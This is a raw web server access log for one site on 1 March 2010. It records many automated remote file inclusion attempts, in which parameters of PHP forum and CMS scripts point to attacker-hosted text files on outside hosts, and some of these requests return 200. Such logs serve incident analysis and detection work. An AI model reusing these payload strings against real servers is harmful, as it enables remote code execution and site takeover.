122.200.203.11 - - [01/Mar/2010:08:22:54 -0800] "GET /logs/access_100211.log%20%20//index.php?page=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [01/Mar/2010:08:22:55 -0800] "GET /index.php?page=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
151.99.231.20 - - [01/Mar/2010:08:22:56 -0800] "GET /logs/access_100118.log//bbs/////delete_comment.php?board_skin_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [01/Mar/2010:08:22:59 -0800] "GET /logs/access_100121.log%20%20//index.php?page=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [01/Mar/2010:08:23:14 -0800] "GET /logs//codebb/lang_select?phpbb_root_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [01/Mar/2010:08:23:15 -0800] "GET /logs/access_100201.log%20%20//codebb/lang_select?phpbb_root_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [01/Mar/2010:08:23:15 -0800] "GET /codebb/lang_select?phpbb_root_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [01/Mar/2010:08:23:16 -0800] "GET /logs//index.php?page=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [01/Mar/2010:08:23:16 -0800] "GET /logs/access_100211.log%20%20//index.php?page=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [01/Mar/2010:08:23:16 -0800] "GET /index.php?page=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [01/Mar/2010:08:23:17 -0800] "GET /logs/access_100211.log%20%20//index.php?page=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [01/Mar/2010:08:23:17 -0800] "GET /logs//index.php?page=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [01/Mar/2010:08:23:17 -0800] "GET /index.php?page=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
61.111.3.35 - - [01/Mar/2010:08:23:17 -0800] "GET //login.php?dir=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.111.3.35 - - [01/Mar/2010:08:23:17 -0800] "GET /logs/access_100201.log%20%20///login.php?dir=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.111.3.35 - - [01/Mar/2010:08:23:18 -0800] "GET /logs///login.php?dir=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [01/Mar/2010:08:23:22 -0800] "GET /logs/access_100121.log%20%20//index.php?page=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [01/Mar/2010:08:23:23 -0800] "GET /logs/access_100121.log%20%20//index.php?page=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.171.218.166 - - [01/Mar/2010:08:23:42 -0800] "GET /logs/access_100207.log%20%20//bbs/////delete_comment.php?board_skin_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.171.218.166 - - [01/Mar/2010:08:23:46 -0800] "GET /logs/access_100207.log%20%20//bbs/////delete_comment.php?board_skin_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [01/Mar/2010:08:23:49 -0800] "GET /logs/access_100123.log%20%20//admin.php?vwar_root=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.111.3.35 - - [01/Mar/2010:08:24:41 -0800] "GET /logs/access_100201.log///login.php?dir=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [01/Mar/2010:08:25:16 -0800] "GET /modules/vwar/admin/admin.php?vwar_root=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [01/Mar/2010:08:25:16 -0800] "GET /logs/access_100201.log%20%20//modules/vwar/admin/admin.php?vwar_root=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [01/Mar/2010:08:25:16 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [01/Mar/2010:08:25:35 -0800] "GET /logs/access_100123.log%20%20//admin.php?vwar_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [01/Mar/2010:08:25:55 -0800] "GET /modules/vwar/admin/admin.php?vwar_root=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [01/Mar/2010:08:25:55 -0800] "GET /logs/access_100201.log%20%20//modules/vwar/admin/admin.php?vwar_root=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [01/Mar/2010:08:26:00 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [01/Mar/2010:08:26:12 -0800] "GET /logs/access_100123.log%20%20//admin.php?vwar_root=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
217.73.168.38 - - [01/Mar/2010:08:27:27 -0800] "GET /logs/access_100206.log//errors.php?error=http://ladroz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
217.73.168.38 - - [01/Mar/2010:08:27:27 -0800] "GET /errors.php?error=http://ladroz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
217.73.168.38 - - [01/Mar/2010:08:27:27 -0800] "GET /logs/access_100130.log//errors.php?error=http://ladroz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
217.73.168.38 - - [01/Mar/2010:08:27:27 -0800] "GET /logs//errors.php?error=http://ladroz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
123.143.29.250 - - [01/Mar/2010:08:28:09 -0800] "GET //login.php?dir=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [01/Mar/2010:08:28:09 -0800] "GET /logs///login.php?dir=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [01/Mar/2010:08:28:09 -0800] "GET /logs/access_100201.log%20%20///login.php?dir=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [01/Mar/2010:08:28:13 -0800] "GET /logs/access_100211.log%20%20//codebb/lang_select?phpbb_root_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
217.73.168.38 - - [01/Mar/2010:08:28:44 -0800] "GET /logs/access_100206.log%20//errors.php?error=http://ladroz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
123.143.29.250 - - [01/Mar/2010:08:28:57 -0800] "GET /logs/access_100201.log///login.php?dir=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.158.210.37 - - [01/Mar/2010:08:30:59 -0800] "GET /logs//erotik/amboard/com_vehic%20php?_SERVER[DOCUMENT_ROOT]=http://kopriusa.org/bbs/gn4/bbs/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.158.210.37 - - [01/Mar/2010:08:30:59 -0800] "GET /erotik/amboard/com_vehic%20php?_SERVER[DOCUMENT_ROOT]=http://kopriusa.org/bbs/gn4/bbs/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.158.210.37 - - [01/Mar/2010:08:30:59 -0800] "GET /logs/access_100201.log//erotik/amboard/com_vehic%20php?_SERVER[DOCUMENT_ROOT]=http://kopriusa.org/bbs/gn4/bbs/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [01/Mar/2010:08:32:04 -0800] "GET /library/editor/editor.php?root=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [01/Mar/2010:08:32:04 -0800] "GET /logs/access_100211.log%20%20//library/editor/editor.php?root=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [01/Mar/2010:08:32:04 -0800] "GET /logs//library/editor/editor.php?root=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [01/Mar/2010:08:32:53 -0800] "GET /logs//appserv/main.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [01/Mar/2010:08:32:53 -0800] "GET /appserv/main.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [01/Mar/2010:08:32:53 -0800] "GET /logs/access_100204.log%20%20//appserv/main.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [01/Mar/2010:08:32:54 -0800] "GET /logs/access_100121.log%20%20//library/editor/editor.php?root=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [01/Mar/2010:08:32:56 -0800] "GET /logs/access_100211.log%20%20//library/editor/editor.php?root=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [01/Mar/2010:08:32:57 -0800] "GET /library/editor/editor.php?root=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [01/Mar/2010:08:33:00 -0800] "GET /logs//library/editor/editor.php?root=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [01/Mar/2010:08:33:16 -0800] "GET /logs/access_100204.log%20%20//appserv/main.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [01/Mar/2010:08:33:16 -0800] "GET /appserv/main.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [01/Mar/2010:08:33:16 -0800] "GET /logs//appserv/main.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [01/Mar/2010:08:33:45 -0800] "GET /logs/access_100121.log%20%20//library/editor/editor.php?root=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [01/Mar/2010:08:34:09 -0800] "GET /logs//login.php?dir=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [01/Mar/2010:08:34:09 -0800] "GET /logs/access_100204.log%20%20//login.php?dir=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [01/Mar/2010:08:34:09 -0800] "GET /login.php?dir=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [01/Mar/2010:08:34:13 -0800] "GET /logs/access.log%20%20//login.php?dir=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.158.210.37 - - [01/Mar/2010:08:34:18 -0800] "GET /logs/access_100221.log%20%20//erotik/amboard/com_vehic%20php?_SERVER[DOCUMENT_ROOT]=http://kopriusa.org/bbs/gn4/bbs/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.158.210.37 - - [01/Mar/2010:08:34:18 -0800] "GET /logs//erotik/amboard/com_vehic%20php?_SERVER[DOCUMENT_ROOT]=http://kopriusa.org/bbs/gn4/bbs/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.158.210.37 - - [01/Mar/2010:08:34:18 -0800] "GET /erotik/amboard/com_vehic%20php?_SERVER[DOCUMENT_ROOT]=http://kopriusa.org/bbs/gn4/bbs/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [01/Mar/2010:08:34:18 -0800] "GET /zero_vote/ask_password.php?dir=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [01/Mar/2010:08:34:19 -0800] "GET /logs/access_100209.log%20%20//zero_vote/ask_password.php?dir=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [01/Mar/2010:08:34:21 -0800] "GET /logs//zero_vote/ask_password.php?dir=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.241.177.123 - - [01/Mar/2010:08:35:41 -0800] "GET /kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.241.177.123 - - [01/Mar/2010:08:35:41 -0800] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.241.177.123 - - [01/Mar/2010:08:35:41 -0800] "GET /logs/access_100214.log%20%20//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [01/Mar/2010:08:36:30 -0800] "GET /performs.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [01/Mar/2010:08:36:30 -0800] "GET /logs/access_100210.log%20%20//performs.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [01/Mar/2010:08:36:30 -0800] "GET /logs//performs.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [01/Mar/2010:08:37:44 -0800] "GET /zero_vote/ask_password.php?dir=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [01/Mar/2010:08:37:44 -0800] "GET /logs/access_100209.log%20%20//zero_vote/ask_password.php?dir=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [01/Mar/2010:08:37:45 -0800] "GET /logs//zero_vote/ask_password.php?dir=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [01/Mar/2010:08:37:58 -0800] "GET /logs////delete_comment.php?board.skin.path=http://www.mosdj.com/images/large/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [01/Mar/2010:08:37:58 -0800] "GET /logs/access_100203.log%20%20////delete_comment.php?board.skin.path=http://www.mosdj.com/images/large/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [01/Mar/2010:08:37:58 -0800] "GET ///delete_comment.php?board.skin.path=http://www.mosdj.com/images/large/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [01/Mar/2010:08:38:00 -0800] "GET /logs/access_100218.log%20%20//zero_vote/ask_password.php?dir=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [01/Mar/2010:08:38:07 -0800] "GET /logs/access_100206.log%20%20////delete_comment.php?board.skin.path=http://www.mosdj.com/images/large/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.92.143.92 - - [01/Mar/2010:08:38:14 -0800] "GET /logs/access_100130.log///?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [01/Mar/2010:08:38:46 -0800] "GET ///delete_comment.php?board.skin.path=http://www.mosdj.com/images/large/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [01/Mar/2010:08:38:46 -0800] "GET /logs/access_100203.log////delete_comment.php?board.skin.path=http://www.mosdj.com/images/large/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [01/Mar/2010:08:38:46 -0800] "GET /logs////delete_comment.php?board.skin.path=http://www.mosdj.com/images/large/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [01/Mar/2010:08:39:04 -0800] "GET /logs/access_100206.log////delete_comment.php?board.skin.path=http://www.mosdj.com/images/large/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.241.177.123 - - [01/Mar/2010:08:39:38 -0800] "GET /logs/access_100119.log%20%20//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.241.177.123 - - [01/Mar/2010:08:39:43 -0800] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.241.177.123 - - [01/Mar/2010:08:39:43 -0800] "GET /logs/access_100214.log%20%20//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.241.177.123 - - [01/Mar/2010:08:39:44 -0800] "GET /kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.233.162.101 - - [01/Mar/2010:08:40:18 -0800] "GET /logs/access_100128.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.233.162.101 - - [01/Mar/2010:08:40:18 -0800] "GET /logs/access_100128.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.233.162.101 - - [01/Mar/2010:08:40:19 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.puaga.com"
85.233.162.101 - - [01/Mar/2010:08:40:19 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.puaga.com"
85.233.162.101 - - [01/Mar/2010:08:40:19 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
85.233.162.101 - - [01/Mar/2010:08:40:19 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
85.233.162.101 - - [01/Mar/2010:08:40:24 -0800] "GET /logs/access_100118.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.233.162.101 - - [01/Mar/2010:08:40:24 -0800] "GET /logs/access_100118.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.115.26 - - [01/Mar/2010:08:40:36 -0800] "GET /sitemap.xml HTTP/1.0" 200 233 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
203.59.136.42 - - [01/Mar/2010:08:40:37 -0800] "GET /logs/access_100128.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.59.136.42 - - [01/Mar/2010:08:40:37 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.puaga.com"
203.59.136.42 - - [01/Mar/2010:08:40:56 -0800] "GET /logs/access_100128.log///?_SERVER[DOCUMENT_ROOT]=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.59.136.42 - - [01/Mar/2010:08:40:56 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
203.59.136.42 - - [01/Mar/2010:08:40:58 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.puaga.com"
77.92.143.92 - - [01/Mar/2010:08:41:16 -0800] "GET /logs/access_100130.log///?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.59.136.42 - - [01/Mar/2010:08:41:19 -0800] "GET /logs/access_100118.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.241.177.123 - - [01/Mar/2010:08:41:42 -0800] "GET /logs/access_100119.log%20%20//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:08:41:56 -0800] "GET /include/prodler.class.php?sPath=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:08:41:56 -0800] "GET /logs//include/prodler.class.php?sPath=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:08:41:56 -0800] "GET /logs/access_100207.log%20%20//include/prodler.class.php?sPath=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:08:42:08 -0800] "GET /include/prodler.class.php?sPath=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:08:42:08 -0800] "GET /logs//include/prodler.class.php?sPath=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:08:42:08 -0800] "GET /logs/access_100207.log%20%20//include/prodler.class.php?sPath=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.92.143.92 - - [01/Mar/2010:08:42:26 -0800] "GET /logs/access.log///?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [01/Mar/2010:08:43:05 -0800] "GET /logs/access_100219.log%20%20//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [01/Mar/2010:08:43:05 -0800] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:08:43:05 -0800] "GET /logs/access_100124.log%20%20//include/prodler.class.php?sPath=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [01/Mar/2010:08:43:05 -0800] "GET /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:08:43:23 -0800] "GET /logs/access_100124.log%20%20//include/prodler.class.php?sPath=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [01/Mar/2010:08:43:43 -0800] "GET /logs//about.php?inc_dir=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [01/Mar/2010:08:43:44 -0800] "GET /about.php?inc_dir=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [01/Mar/2010:08:43:44 -0800] "GET /logs/access_100131.log%20%20//about.php?inc_dir=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [01/Mar/2010:08:44:19 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
